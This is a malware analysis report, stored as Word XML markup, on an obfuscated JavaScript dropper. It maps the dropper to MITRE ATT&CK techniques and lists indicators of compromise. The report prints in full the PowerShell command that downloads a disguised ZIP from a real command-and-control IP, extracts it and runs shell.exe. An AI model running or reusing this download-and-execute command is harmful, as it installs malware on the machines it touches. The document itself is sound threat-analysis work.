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1232" w14:textId="3A330AEE" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>🛡</w:t>
      </w:r>
      <w:r>
        <w:t>️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Technical</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Analysis Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1AAFA6" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>📄</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Title:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD168F2" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:r>
        <w:t>Obfuscated JavaScript Dropper Using PowerShell to Deliver Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089FE08E" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>📑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78764ACD" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:r>
        <w:t xml:space="preserve">A malicious JavaScript sample was identified using obfuscation techniques to evade static </w:t>
      </w:r>
      <w:r>
        <w:t>detection. The script leverages Windows Script Host (WSH) via an ActiveXObject (WScript.Shell) to execute a PowerShell command that downloads a file from an external Command and Control (C2) server, extracts it, and executes a secondary payload.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>The prima</w:t>
      </w:r>
      <w:r>
        <w:t>ry goal of this dropper is to deliver and run a file named shell.exe from a remote ZIP archive hosted on a suspicious IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D20828C" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>🔍</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Behavioral Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133D1A3E" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:pPr>
        <w:pStyle w:val="31"/>
      </w:pPr>
      <w:r>
        <w:t>1. Obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2466DC" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:r>
        <w:t>The script uses a self-modifying function (_0x52fe) with a numeric offset and a hardcode</w:t>
      </w:r>
      <w:r>
        <w:t>d array of string fragments. The goal of this obfuscation is to hide string literals and logic to bypass static detection by antivirus or EDR tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518AD173" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:pPr>
        <w:pStyle w:val="31"/>
      </w:pPr>
      <w:r>
        <w:t>2. Execution Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55920636" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:r>
        <w:t xml:space="preserve">The script instantiates WScript.Shell via ActiveXObject to gain execution capabilities. </w:t>
      </w:r>
      <w:r>
        <w:t>It dynamically builds a PowerShell command and executes it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0532DC" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:pPr>
        <w:pStyle w:val="31"/>
      </w:pPr>
      <w:r>
        <w:t>3. PowerShell Payload Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087D1BAF" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:r>
        <w:t>The script builds and runs the following PowerShell command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429BC26B" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:r>
        <w:t>powershell -Command "Start-BitsTransfer -Source 'http://185.81.157.148:777/j.jpg' -DestinationPath 'C:\Us</w:t>
      </w:r>
      <w:r>
        <w:t>ers\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force; Start-Process 'C:\Users\Public\shell.exe'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7E6566" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:r>
        <w:t>This command performs three actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4804F4C9" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:r>
        <w:t>1. Download a file (j.jpg) using Start-BitsTransfer from a remot</w:t>
      </w:r>
      <w:r>
        <w:t>e server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012FB13E" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:r>
        <w:t>2. Save it as a ZIP file to: C:\Users\Public\ben.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAF526B" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:r>
        <w:t>3. Extract the archive to C:\Users\Public\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F9A3DE" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:r>
        <w:t>4. Execute the extracted file shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29106E8D" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>📌</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Indicators of Compromise (IOCs)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84"/>
        <w:gridCol w:w="7172"/>
      </w:tblGrid>
      <w:tr w:rsidR="00396486" w14:paraId="10632600" w14:textId="77777777" w:rsidTr="00ED6291">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="766DF2C8" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7307E182" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00396486" w14:paraId="19CE9DC3" w14:textId="77777777" w:rsidTr="00ED6291">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46B58586" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>C2 URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CD03002" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>http://185.81.157.148:777/j.jpg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00396486" w14:paraId="5EF887E5" w14:textId="77777777" w:rsidTr="00ED6291">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2686FDEF" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23C8873A" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>185.81.157.148</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00396486" w14:paraId="6ED8168E" w14:textId="77777777" w:rsidTr="00ED6291">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CA6CDEA" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>Executable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06365E9B" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>C:\Users\Public\shell.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED6291" w14:paraId="0DE448A2" w14:textId="77777777" w:rsidTr="00ED6291">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16985BFA" w14:textId="0EC7D308" w:rsidR="00ED6291" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>File Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E0D4385" w14:textId="7222732B" w:rsidR="00ED6291" w:rsidRDefault="00ED6291">
            <w:r w:rsidRPr="00ED6291">
              <w:t>978bf1471b3536dfdea854dd1c5d8ee63bdfbc8223c0254a92b183a711699a3a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72E632E7" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>🧪</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK Mapping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96486" w14:paraId="27DABF36" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="043BC8B9" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04901DFA" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00396486" w14:paraId="5D8FEC53" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DE647B9" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>T1059.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="565A3429" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t xml:space="preserve">PowerShell: </w:t>
            </w:r>
            <w:r>
              <w:t>Scripting via PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00396486" w14:paraId="6A3BA34C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="756A0769" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>T1204.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FAB507C" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>User Execution: Malicious Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00396486" w14:paraId="4EB7BA78" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CF49D5D" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F45AAD7" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>Ingress Tool Transfer (file download)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00396486" w14:paraId="2474EA77" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7979688E" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>T1027</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41ACFD0E" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
            <w:r>
              <w:t>Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13E71121" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>📎</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Additional Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2288CD85" w14:textId="77777777" w:rsidR="00396486" w:rsidRDefault="00ED6291">
      <w:r>
        <w:t>Although the file j.jpg has a .jpg extension, it is treated as a ZIP archiv</w:t>
      </w:r>
      <w:r>
        <w:t>e. This is a known tactic to bypass file-type filtering.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>shell.exe is likely the true malware payload, and further investigation is required to understand its capabilities.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003964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486"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00ED62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55A86"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{177C3006-D135-4EB8-9304-383863EE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2025-06-30T08:42:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>